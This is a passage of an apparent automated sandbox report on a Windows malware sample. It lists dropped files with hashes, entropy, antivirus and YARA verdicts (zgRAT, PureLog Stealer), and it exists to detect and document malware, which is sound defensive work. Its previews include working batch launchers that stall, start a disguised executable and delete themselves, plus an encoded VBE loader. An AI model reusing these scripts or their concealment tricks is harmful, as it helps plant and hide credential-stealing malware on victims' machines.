                                      SHA-512:83FD44E2A11B16311FFF33BCD189442DE695C04146079E5400B30459DB1839E8FD5DA600F37F180896BD3F8958A2530486937A411E761C33958353FABEAABEF1
                                      Malicious:false
                                      Preview:dirtbBc96hqM3ZYtSt3uPAtTn

                                      C:\Users\user\AppData\Local\Temp\1j6QQD1Pz0

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.023465189601646
                                      Encrypted:false
                                      SSDEEP:3:++dRWuixn:++mfxn
                                      MD5:941C54E4A3BF448D498B8635E39774D7
                                      SHA1:197DF0FF75BD3CB6B1D0ACA48316A58CE3EF49CE
                                      SHA-256:ACEEA99C26727291E522AFCA51CC815E89B3A0A57EAA8AF91664DB4331869F0F
                                      SHA-512:924EA0E49F47321A47A824276A5815D29E07D480BC7792BE3510E1691A3EF63877138450FAF0611E68F4C134D8CE59A76C396C7E86AE8894607DA4243CC19678
                                      Malicious:false
                                      Preview:OOxZiBPYKrc9EziyUKPirKVkT

                                      C:\Users\user\AppData\Local\Temp\3yCQUAO5Z7

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.4838561897747224
                                      Encrypted:false
                                      SSDEEP:3:t3ihsx:t3L
                                      MD5:D1A45F7A4FE281D7CBF5722B394AF983
                                      SHA1:1A0541B5C8F8935D86085612B144778A2A3CC5DD
                                      SHA-256:D4893EE33B1BD50F7BEB75BD5D6959283BFD9FC414CC4B9B51CA1F6E199F5452
                                      SHA-512:66608447D55A5EEA84404C790A909BEADB196F765F620CE3C3AA5DA6541778A06122B5B55EFA85A29747F5E29FD97BA1CCE5B6B765423503FC21C9577CE28406
                                      Malicious:false
                                      Preview:4qraxQeRbgjV28o4Rsul6FZOM

                                      C:\Users\user\AppData\Local\Temp\5K6fCoMBVq.bat

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):276
                                      Entropy (8bit):5.344697572197582
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23fNirn:HTg9uYDEarV1XFh6CDf1ir
                                      MD5:B39DDCB6B583EA3C9DB4574BDFA225D4
                                      SHA1:E16067A98FDF265858DA0DF2C96FD9C1C2E21F4A
                                      SHA-256:BA6D18C4FB320508963F6B034D3CDD2CC1948E907F140FA1E77833AAA397CD2D
                                      SHA-512:21F60DDAFC58A1084D9DD674E7F79AE8581B5131E9D60724F3CD0C883FBF952A061B7E8E813311739ED695A801FFB897DB91601CD98D84D0ED0102375125D3CB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\5K6fCoMBVq.bat"

                                      C:\Users\user\AppData\Local\Temp\6vaca2I0ey

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.003856189774724
                                      Encrypted:false
                                      SSDEEP:3:6XI0bpzy:6XI0U
                                      MD5:D2576248AD9AD30BCFC77CD9374BDB5E
                                      SHA1:F39CEC6D58F7955032E4DEBACB0C92713A5E793C
                                      SHA-256:1BF862C555A4C23A3753859993DBA1E6CB4A12351FD591617C11F87CC0592E8A
                                      SHA-512:51DB4350B34C085BBD44AE0B1DFEC7923AF143743ADBEB100DC94DA725AEB8049377145772DF24FD336FE35F7C0896A77E54D6DE49F60A502418A420CDC66BFA
                                      Malicious:false
                                      Preview:XdsdJneEd5zgVgxUdjCPELVL9

                                      C:\Users\user\AppData\Local\Temp\CIgU97g4i9

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.213660689688185
                                      Encrypted:false
                                      SSDEEP:3:N2FA21G:NgAr
                                      MD5:BD2BF7F25FEFDFE93882CF7DE20AB968
                                      SHA1:D047223B818882169A5924D4EF45329828649DD4
                                      SHA-256:F78DEA3E81C7E6F6721C35019BF30673FDA1CA255F555A661CFDFBFCD3B99E97
                                      SHA-512:2F5124CAC525C3C99B83711569E33E1D122E27FFF8C2BEE85A3A4774458D8FF3A49F6479B2500470A54E7C2F1F9934224F0977F0371DE6DFE69BE795B5D1CC58
                                      Malicious:false
                                      Preview:YCZdvS6R8uhcCRfOPPaZtyRLW

                                      C:\Users\user\AppData\Local\Temp\DoC45cXmCX.bat

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):276
                                      Entropy (8bit):5.32407951251747
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23f2R:HTg9uYDEarV1XFh6CDf+R
                                      MD5:CABD2A91DD6B56E0B8C8F553C0F2133F
                                      SHA1:5477FA1650A2D134CCC441D65AB76AB6B5692F7B
                                      SHA-256:57CC30040B6D598EF74A730439CA12AE0F6E04EB9370E78B058DF59C686A43EB
                                      SHA-512:81B7B7BBF13074331BC7821324299CC081D0EB2C92C03358EF5C623EDF246886449B57FE6E855655852A286C4798C221E4E215308193FC25C3DE86A2408675D1
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\DoC45cXmCX.bat"

                                      C:\Users\user\AppData\Local\Temp\ECvQfnJznV.bat

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):228
                                      Entropy (8bit):5.371093766449748
                                      Encrypted:false
                                      SSDEEP:6:hCRLuVFOOr+DEaQIH11XFh6nCvKOZG1wkn23fV:CuVEOCDEarV1XFh6CDft
                                      MD5:CD874997A856FBD785749E031DF7CD33
                                      SHA1:233F9ECF780B9120B64B2110DD48CE1C797C851A
                                      SHA-256:E8523EF0500D445B120EDB146AF2743848F4696E1E76F6C3365DE8C828675FC4
                                      SHA-512:36BAB5BD9586E95B4C2A236AA94DE5F93E92CB9F9F42532B71AA55AE71005A97E331F975E7D202B8336E0C8A974902D3FD64C15AC65C2D06ACEAF10B60296CD8
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ECvQfnJznV.bat"

                                      C:\Users\user\AppData\Local\Temp\GxEp7zFCwB.bat

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):276
                                      Entropy (8bit):5.358233172808352
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23fFSNK:HTg9uYDEarV1XFh6CDfx
                                      MD5:B5579C996822B2E655ECCB16D69AF1B2
                                      SHA1:B0D258B63A2A517030C5B80A213D6C26FA7DF8F5
                                      SHA-256:08E3C7606FC513E5AC90024E14C7EA801D10E0EE43598B13F831D2D4916C15FA
                                      SHA-512:DBB6CA9DF37DF3E52D7C5525321E5C5A6618A880116BAB35F22419C60861D184C6571B46CFB4E63E9D9B5043288798E7FE99540265DD1451D598C89C559B853A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\GxEp7zFCwB.bat"

                                      C:\Users\user\AppData\Local\Temp\JBDwmHPvRo

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.0194705707972505
                                      Encrypted:false
                                      SSDEEP:3:tmnTQt:tmTQt
                                      MD5:F166D9111698390A630902D4A3331F3E
                                      SHA1:7AE5A612772F546BECD47B7A605A0A08B95A0B57
                                      SHA-256:6C1B35062BD8C09F347E96DBB8F651BFA0C0D6B73457667715D02926B69E4800
                                      SHA-512:F72313CF2B26C1E907F9238F63F3246A98EE4F0C2D0BB2B3604D7D82DDDD4A6C5CF4B92B1D9492BB67A0E4E877E4D5A1B9E1F7F8E4D09A53805F52356A5C1E7C
                                      Malicious:false
                                      Preview:IClfDarmNAWQEsEcAxbfeAzAA

                                      C:\Users\user\AppData\Local\Temp\QCmtwup8yW

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.103465189601646
                                      Encrypted:false
                                      SSDEEP:3:yS6nbkVQYL/5:B6nbkN
                                      MD5:341B5C84334FB15B7E31342B8E9FCCBA
                                      SHA1:7FD42E71238102C39AEE2C1D54B48C8E97CC0945
                                      SHA-256:84ED5FA890FC711C2399D1C1A4C8451FDAD4433A9C5E14EAC0376FDF74EE172D
                                      SHA-512:68FF599E97749DA1BE100411FA8FFE515EE5E275FAD63FA61B9ED219EE754A2F7D48AE19990ADDB089BF82C6E060DD69BA8E4A92C02002FC1D22657001A9B936
                                      Malicious:false
                                      Preview:OQPE7JGakLPu9OpuuGMn3K4oG

                                      C:\Users\user\AppData\Local\Temp\TEZ3NyskMn

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.403856189774723
                                      Encrypted:false
                                      SSDEEP:3:oxK/10ux:oxk+ux
                                      MD5:1652217EA06BF080F5F65A4505E1B3F6
                                      SHA1:ACD6BC928E29CD510FE275765A00CC30CBFD7614
                                      SHA-256:F199DEC07178EC254A4C14C8A5B8ED97A3006B1B0BC374F3563FCA80B14CBF08
                                      SHA-512:5A3D93371776A7CD855CBFF9DFF4962331202456215BA18FE8A6E37EDFDC4F99F9097D8CC4C1092E59ED036097985B60C83F74A771B19A2B561E7EDC89F53D70
                                      Malicious:false
                                      Preview:AJhCD0K87z5UxrZd4PQ1RSSRr

                                      C:\Users\user\AppData\Local\Temp\UCvjmtCiY3.bat

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):276
                                      Entropy (8bit):5.318883158902565
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23famn:HTg9uYDEarV1XFh6CDfim
                                      MD5:A038BE5A1B499700CF7917BE79C24979
                                      SHA1:FD62D98CF8E18522EDA35ADA3763099EA3BE6F5A
                                      SHA-256:C55C53A73E860E1718848C01C1B22ECFEA3893295B4617EA5779852BD1B5E15E
                                      SHA-512:16432F8DFA2697A25D155174065EB70C68176158D553F4CD8C62EA391AC6F1A959256B2497874349FA0E1B74A73F0C0398D00B22712A5205B2CAC09C2A6CB0CC
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\UCvjmtCiY3.bat"

                                      C:\Users\user\AppData\Local\Temp\VZ5NRqL9s1

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.0536606896881855
                                      Encrypted:false
                                      SSDEEP:3:MIqnd+X1sXn:M34X1sX
                                      MD5:3A3350A67BB49176224B6013F6CF2DCD
                                      SHA1:8730906BA220F8DB872BBC86F2F3F76D214D1F44
                                      SHA-256:2B1F27DBD015FA0F40C380D14DD18835A7E992992977CE51ABC05982CE65866E
                                      SHA-512:B56AB8C49E74BD3B0ED100521BC9CAA1CE02CDFFECBE8FBF6625F687A3096D0EC758CD6927A0F12872AA5587E346E79C8DF8FCBF0284AFE441D631615DDDB373
                                      Malicious:false
                                      Preview:riviBamOvNiJwNmjeB1PZA9KZ

                                      C:\Users\user\AppData\Local\Temp\bviytIjYVg.bat

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):276
                                      Entropy (8bit):5.348827588273908
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23fBMDkh:HTg9uYDEarV1XFh6CDfCq
                                      MD5:116FF2C63FE1287C0BF0CCA8241AA1F2
                                      SHA1:B45F28B2A7FB283660408B64A06BDE3D24ADD4E7
                                      SHA-256:9B074C9635123303076A959F13E94A3DF48F0D665F7726E2723FA1391B87A2BF
                                      SHA-512:6A33CE613C4B7C30B5F46882031AA25422B563B29A45AF11447377FBDD5A971FA30E3BF19DE85AF7216DAF56AE2B0FFC454426FAD704CBA648CC358B0FE32900
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\bviytIjYVg.bat"

                                      C:\Users\user\AppData\Local\Temp\ddp3dI2Wa5.bat

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):276
                                      Entropy (8bit):5.309901687146654
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23fWg:HTg9uYDEarV1XFh6CDf+g
                                      MD5:203D21D95C66FC016AE23D9BC255643E
                                      SHA1:B3A5930FA74A2C264CA07892DB8034AEB80541FA
                                      SHA-256:AF5C26ACEED90FB4A15073BBC26C4BFE9F6891D0FAA833BE65420E5FB364608E
                                      SHA-512:282964CAC70773D46742AD5E923741CCBAEE33113929C6A41A31F5F3116F1B494CC6AB3C1B00FBDEDCB8C8ADC2879E251903B0644280871A93182455A09803AA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ddp3dI2Wa5.bat"

                                      C:\Users\user\AppData\Local\Temp\e0SyjlrUIm

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.403856189774723
                                      Encrypted:false
                                      SSDEEP:3:IicireLm:IUrv
                                      MD5:4D6BAEC18A66CCFB0443D77CD783D552
                                      SHA1:06BE0D11667685AB1A14E76D1896AA7E785C3D05
                                      SHA-256:CA829623841A094606055D292EB4204917970C6C9D36004D6D163B111779F36E
                                      SHA-512:4F2DA30AFDB6C18B15499F5246A589E3F547AC164150B9C274E1B34819083B6A8F41D2B4264CD677EA5F1EB243585EB39B781438B3204CCA7E261493F1294E53
                                      Malicious:false
                                      Preview:EhvKZqDLqEajw0tQnu2iJs33C

                                      C:\Users\user\AppData\Local\Temp\iYS6J37wVC

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.4838561897747224
                                      Encrypted:false
                                      SSDEEP:3:OUFoMqn:OU6X
                                      MD5:170AEB0B8FC0E9C8AB227B5500E93954
                                      SHA1:08BBAAE5C2FC0970A54276D13CDB763075E4D767
                                      SHA-256:F25FD5BAEE9A5F73EEEFCD4C2D84DBCA8BF846E2435659936C91FFD02D81D561
                                      SHA-512:2D80D6EC2D7AE1F10C37E79291C5E4ACC8D543DFE179BC477F17986588A753BBB343182D08443C1F9FB46A54AEF24FA1F7ADA70FBC2F4AAED39448DF80462599
                                      Malicious:false
                                      Preview:HItqsNVRI6nhzwFYyfSRxMu09

                                      C:\Users\user\AppData\Local\Temp\ioU5vtTN9b

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.403856189774723
                                      Encrypted:false
                                      SSDEEP:3:IcaRqC0YW:IjqC0h
                                      MD5:D4082058232F38F454DB86233B1285CA
                                      SHA1:780ADC5A831BE47EC61E1290BA480B257B69F920
                                      SHA-256:480220CA481E456DF0BA0F70A4DBAC3AFDCE186F4A217482EFD947C91BFBDA54
                                      SHA-512:C55B19CCD9EFC5C9A8D2C0FBB275E90314DE6CB5DA6FF3FC320DCC771199C4B847364D8913C59B8026E8C814E1AC72A1BC7E05F55DFE62A0C0A468AA1FC32B92
                                      Malicious:false
                                      Preview:DLe9s6JySaTi4n9QagQvl2O8q

                                      C:\Users\user\AppData\Local\Temp\nXpNUGu1Ke.bat

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):276
                                      Entropy (8bit):5.340408228828121
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23fLG4uuq:HTg9uYDEarV1XFh6CDfjG4zq
                                      MD5:AEE2E03AD2CBC7935DC580CEE5CCB1FA
                                      SHA1:8DB52B29E6DA073DF8445A9EF079E00F93BB1D3C
                                      SHA-256:EA67265F7C7C6A192DBDF6CBD283545E14753FBB8D023DF203CE480008EE17FA
                                      SHA-512:7A5F435B12141D6D4723C334A86D980C89698B805A94947A1FFA7ED6A604680DA0F42F99D5645B6B1778DE73D4C93BDB177295E3C516723CCAAC4C04D8D5AEAA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\nXpNUGu1Ke.bat"

                                      C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):228
                                      Entropy (8bit):5.327177261908314
                                      Encrypted:false
                                      SSDEEP:6:hCRLuVFOOr+DEaQIH11XFh6nCvKOZG1wkn23f7l:CuVEOCDEarV1XFh6CDfTl
                                      MD5:680193250AF14B51273437F4DA4FD5B8
                                      SHA1:D40CC8F082402C677B6863C2898068022EEA7A55
                                      SHA-256:CF182EBA2827DF394C39727BA67F08586A8FEDDC638EBDF705A2BBD3F20FA548
                                      SHA-512:CD9B30C164CD73785843994883AD81AA9302077F1E598C1B5CB6580A6DBB0078DEA18AC521DC1C69AF59B8BA0F1BFDDF17DDE5D0971694E3327AA26A34891D83
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\nhkbaghNki.bat"

                                      C:\Users\user\AppData\Local\Temp\qlEmwzstBs.bat

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):276
                                      Entropy (8bit):5.313560168813636
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23fHWnMqn:HTg9uYDEarV1XFh6CDfenMqn
                                      MD5:DA6ADE8BE19CFEE2A150B6A3EF995765
                                      SHA1:3834680854371B414DF2E7E7E63A0C2CCE767BF4
                                      SHA-256:9894C46EC4E049E11FA6D279EB9BCC4BC2F6090F3F65E67670245CC8E5C4491D
                                      SHA-512:C4EFF55C39319B7E35C6885C2196117B63C69E5B68A94EE6A8A024C7D7B05C5242021AB105118BE383D865DCACFFD241E1C35E4CA7CFFBBC7A60F0D50FA85626
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\qlEmwzstBs.bat"

                                      C:\Users\user\AppData\Local\Temp\ujuZrulyBl.bat

                                      Download File
                                      Process:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):276
                                      Entropy (8bit):5.317411903382027
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DEaQIH11XFh6nCvKOZG1wkn23f5S:HTg9uYDEarV1XFh6CDfxS
                                      MD5:A619CB7AA89011DFC722C6BBF275E20C
                                      SHA1:3B456D873AD2ED960B29C9F855F060FB1CEAB082
                                      SHA-256:217DECCC533AAA42C1D446ACE2A7DD2583E84727440C792E622CE5386A2A6545
                                      SHA-512:EC59ABC962C25ACF3B9753B848C93A07F3B953E9F29E40CF492D7137A30A5C84AC86C434FDE8D70B658271D28D37D5C2518FA4CFE548D542D2297F8FD369ADE2
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ujuZrulyBl.bat"

                                      C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe

                                      Download File
                                      Process:C:\Users\user\Desktop\7vP2IvNXqx.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):252
                                      Entropy (8bit):5.901675636760285
                                      Encrypted:false
                                      SSDEEP:6:G7wqK+NkLzWbHa/818nZNDd3RL1wQJRZ70OeWtOp+FpGd0gSD3Rxgas:GyMCzWLaG4d3XBJr73ePp6X/RU
                                      MD5:501D197D63D450807FF2A2E971164369
                                      SHA1:D93FEBA0475AE1BCD82507DB5C2FF6439549683F
                                      SHA-256:A7C725C92D2C750356D0A7C5754F4BF1F5B8DAA4CE2CC24E5B9B7C789C75E601
                                      SHA-512:5BB0BD4E3CDF77C68F663F8E1C940A5266E944491E1D4A8125581C4FFECA9DA580F29F412C66CD0434A9B33842F031B03E790F79F83C7FD28DFC464E52849530
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:#@~^4wAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~Ju)aw9mYm]zs/h.W7k[+M4.GS/+M.+6NV^&&X! .|^qAAZ.}y8[kUCV%OGqCzlSJVd*lV.h*d,MWVD$Gc4CYr~~TBP0ms/.AkkAAA==^#~@.

                                      C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\7vP2IvNXqx.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1656320
                                      Entropy (8bit):7.420770523484582
                                      Encrypted:false
                                      SSDEEP:24576:7nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQoYyx8MU:7TAjRK61bGW2djTuBkLIX8
                                      MD5:07A0FB75F52C87371C88F48AE80AFA1B
                                      SHA1:A2184C8F4C5A1B81A1E8BF426DB05EAC504A66A0
                                      SHA-256:51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
                                      SHA-512:0322117985791E69BA8E985659B7F91FCCA76809C998C9AE4AF5FCD98B2D757E8E18960FBE3C6D9C9AC306E5F01A78D7E70E950D3B77A80ABA1698C5B69C75CB
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 78%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................>..........^\... ...`....@.. ....................................@..................................\..K....`..p............................................................................ ............... ..H............text...d<... ...>.................. ..`.rsrc...p....`.......@..............@....reloc...............D..............@..B................@\......H...........t.......g...h....z...[.......................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{l...9....& ....8........0.......... ........8........E....P.......|...........8K...~....(A... .... .... ....s....~....(E....... ....~....{....9....& ....8........~....(I...~....(M... ....?:... ....8k......... ....~....{....:Q...& ....8F...r...ps....z*~....:.... ....8&.....(....*

                                      C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\yu2eKcIww0WQz1diSHkj97Iay5LLlL45l6P5L9G4ltB7.bat

                                      Download File
                                      Process:C:\Users\user\Desktop\7vP2IvNXqx.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):106
